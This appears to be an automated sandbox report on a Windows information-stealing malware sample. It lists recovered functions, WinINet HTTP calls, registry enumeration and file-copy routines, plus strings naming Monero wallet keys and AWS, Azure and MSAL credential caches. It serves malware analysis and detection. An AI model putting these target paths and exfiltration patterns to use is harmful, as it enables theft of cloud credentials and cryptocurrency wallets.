Opcode ID: d3f33fde1384210c0a9ee82f5e9a40d95f947a37e1b680a91bd3212ea3e320d2
Instruction ID: 7d765f74c5b22b0cf7926580846de865a284aff6a44c25358c0439232949d89a
Opcode Fuzzy Hash: d3f33fde1384210c0a9ee82f5e9a40d95f947a37e1b680a91bd3212ea3e320d2
Instruction Fuzzy Hash: F2121D71821118AADB95FBE0DC95FEEB37ABF15700F50419EB10662091EF342E49CF69

Function 0069CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0135A4B0,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0069D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0069D0CE
lstrcat.KERNEL32(?,00000000), ref: 0069D208
lstrcat.KERNEL32(?,006B1478), ref: 0069D217
lstrcat.KERNEL32(?,00000000), ref: 0069D22A
lstrcat.KERNEL32(?,006B147C), ref: 0069D239
lstrcat.KERNEL32(?,00000000), ref: 0069D24C
lstrcat.KERNEL32(?,006B1480), ref: 0069D25B
lstrcat.KERNEL32(?,00000000), ref: 0069D26E
lstrcat.KERNEL32(?,006B1484), ref: 0069D27D
lstrcat.KERNEL32(?,00000000), ref: 0069D290
lstrcat.KERNEL32(?,006B1488), ref: 0069D29F
lstrcat.KERNEL32(?,00000000), ref: 0069D2B2
lstrcat.KERNEL32(?,006B148C), ref: 0069D2C1
lstrcat.KERNEL32(?,00000000), ref: 0069D2D4
lstrcat.KERNEL32(?,006B1490), ref: 0069D2E3

Part of subcall function 006AA820: lstrlen.KERNEL32(00694F05,?,?,00694F05,006B0DDE), ref: 006AA82B
Part of subcall function 006AA820: lstrcpy.KERNEL32(006B0DDE,00000000), ref: 006AA885

lstrlen.KERNEL32(?), ref: 0069D32A
lstrlen.KERNEL32(?), ref: 0069D339

Part of subcall function 006AAA70: StrCmpCA.SHLWAPI(013591D8,0069A7A7,?,0069A7A7,013591D8), ref: 006AAA8F

DeleteFileA.KERNEL32(00000000), ref: 0069D3B4

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: c027793b81867416e54b569bfcace16447025eeef0b1a86d34c603ed80a22631
Instruction ID: 3a7efa456ef7f6be8986e3788d2741cd028b3fb6861e2b17b7f2d0d4adb16e9b
Opcode Fuzzy Hash: c027793b81867416e54b569bfcace16447025eeef0b1a86d34c603ed80a22631
Instruction Fuzzy Hash: 43E1F771911108ABCB88FBE0DD96EEE737ABF15301F10416AB507A6091DF35AE09CF66

Function 00694880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00694915
StrCmpCA.SHLWAPI(?,0135E928), ref: 0069493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00694ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006B0DDB,00000000,?,?,00000000,?,",00000000,?,0135E828), ref: 00694DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00694E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00694E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00694E49
InternetCloseHandle.WININET(00000000), ref: 00694EAD
InternetCloseHandle.WININET(00000000), ref: 00694EC5
HttpOpenRequestA.WININET(00000000,0135E8F8,?,0135E1D0,00000000,00000000,00400100,00000000), ref: 00694B15

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

InternetCloseHandle.WININET(00000000), ref: 00694ECF

Strings

------, xrefs: 00694C69
", xrefs: 00694D33
------, xrefs: 00694B28
", xrefs: 00694BF2
------, xrefs: 006949BD

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 50928216e4b18c5bc6c90ac02968411a59cdee0a471d97e98da9ca137d94f3d0
Instruction ID: 27312c19a6e58bc3d9b7a82d810b968978df1e94c97fbdf52b73f32fecc61a9c
Opcode Fuzzy Hash: 50928216e4b18c5bc6c90ac02968411a59cdee0a471d97e98da9ca137d94f3d0
Instruction Fuzzy Hash: 7D12EC71911118AADB95FB90DC92FEEB37ABF16300F50419EB10662091EF742F49CF6A

Function 006A8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

RegOpenKeyExA.KERNEL32(00000000,0135B148,00000000,00020019,00000000,006B05B6), ref: 006A83A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006A8426
wsprintfA.USER32 ref: 006A8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 006A847B
RegCloseKey.ADVAPI32(00000000), ref: 006A848C
RegCloseKey.ADVAPI32(00000000), ref: 006A8499

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Strings

?, xrefs: 006A837A
- , xrefs: 006A85A3
%s\%s, xrefs: 006A844D

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 2b11265214b54593bc9a213b9092886ae27288dff94e492ec1fd11f57fe41f2d
Instruction ID: fadc0fbe4fe1e44b6edd13b6b4d1ef64e57e55f91ec3e90f31ecd1ecab1e8c42
Opcode Fuzzy Hash: 2b11265214b54593bc9a213b9092886ae27288dff94e492ec1fd11f57fe41f2d
Instruction Fuzzy Hash: CE811F719111189FEB68EB50CC95FEA77B9FF08700F108299E109A6180DF75AF85CF95

Function 00696280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

InternetOpenA.WININET(006B0DFE,00000001,00000000,00000000,00000000), ref: 006962E1
StrCmpCA.SHLWAPI(?,0135E928), ref: 00696303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00696335
HttpOpenRequestA.WININET(00000000,GET,?,0135E1D0,00000000,00000000,00400100,00000000), ref: 00696385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006963BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006963D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006963FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0069646D
InternetCloseHandle.WININET(00000000), ref: 006964EF
InternetCloseHandle.WININET(00000000), ref: 006964F9
InternetCloseHandle.WININET(00000000), ref: 00696503

Strings

GET, xrefs: 0069637C
ERROR, xrefs: 006964C9
ERROR, xrefs: 00696407

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 2bf5e4a1ac5f98efff3fb2f5d0f066d59698adfa71dc5fa4528e7bc7d9624264
Instruction ID: 42940420df6eaeb7465e7e40fe4235d06442b346400c8e8ef7f7c02aa619dab1
Opcode Fuzzy Hash: 2bf5e4a1ac5f98efff3fb2f5d0f066d59698adfa71dc5fa4528e7bc7d9624264
Instruction Fuzzy Hash: 88715B71A00318ABDF64EBE0CC49BEE77BABB45700F108199F50A6B590DBB46E85CF51

Function 006A5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA820: lstrlen.KERNEL32(00694F05,?,?,00694F05,006B0DDE), ref: 006AA82B
Part of subcall function 006AA820: lstrcpy.KERNEL32(006B0DDE,00000000), ref: 006AA885

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A56A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5857

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006A51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5228

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006A52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5318
Part of subcall function 006A52C0: lstrlen.KERNEL32(00000000), ref: 006A532F
Part of subcall function 006A52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 006A5364
Part of subcall function 006A52C0: lstrlen.KERNEL32(00000000), ref: 006A5383
Part of subcall function 006A52C0: lstrlen.KERNEL32(00000000), ref: 006A53AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5A0C
Sleep.KERNEL32(0000EA60), ref: 006A5A1B

Strings

ERROR, xrefs: 006A577D
ERROR, xrefs: 006A59FE
ERROR, xrefs: 006A5693
ERROR, xrefs: 006A5849
ERROR, xrefs: 006A5932
ERROR, xrefs: 006A5636

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 35c198e61aea0afa3b519abd2a3ca4fe855ad123ee7c276cade93326aeaf9ffb
Instruction ID: 804c03c5f368dacde76bad10e93c683e6ab4e23c03cb2280c0fcb0ea65f367ba
Opcode Fuzzy Hash: 35c198e61aea0afa3b519abd2a3ca4fe855ad123ee7c276cade93326aeaf9ffb
Instruction Fuzzy Hash: 0CE12071910104AACB98FBE0DC52AFE737AAF56300F50856EB50766191EF34AE09CF96

Function 006A4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B

lstrcat.KERNEL32(?,00000000), ref: 006A4DB0
lstrcat.KERNEL32(?,\.azure\), ref: 006A4DCD

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A492C
Part of subcall function 006A4910: FindFirstFileA.KERNEL32(?,?), ref: 006A4943

lstrcat.KERNEL32(?,00000000), ref: 006A4E3C
lstrcat.KERNEL32(?,\.aws\), ref: 006A4E59

Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
Part of subcall function 006A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
Part of subcall function 006A4910: FindClose.KERNEL32(000000FF), ref: 006A4B92

lstrcat.KERNEL32(?,00000000), ref: 006A4EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 006A4EE5

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A49B0
Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B08D2), ref: 006A49C5
Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A49E2
Part of subcall function 006A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 006A4A1E
Part of subcall function 006A4910: lstrcat.KERNEL32(?,0135E838), ref: 006A4A4A
Part of subcall function 006A4910: lstrcat.KERNEL32(?,006B0FF8), ref: 006A4A5C
Part of subcall function 006A4910: lstrcat.KERNEL32(?,?), ref: 006A4A70
Part of subcall function 006A4910: lstrcat.KERNEL32(?,006B0FFC), ref: 006A4A82
Part of subcall function 006A4910: lstrcat.KERNEL32(?,?), ref: 006A4A96
Part of subcall function 006A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 006A4AAC
Part of subcall function 006A4910: DeleteFileA.KERNEL32(?), ref: 006A4B31

Strings

Azure\.azure, xrefs: 006A4DD3
msal.cache, xrefs: 006A4EF0
*.*, xrefs: 006A4E64
Azure\.IdentityService, xrefs: 006A4EEB
*.*, xrefs: 006A4DD8
\.IdentityService\, xrefs: 006A4ED9
\.azure\, xrefs: 006A4DC1
Azure\.aws, xrefs: 006A4E5F
\.aws\, xrefs: 006A4E4D

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
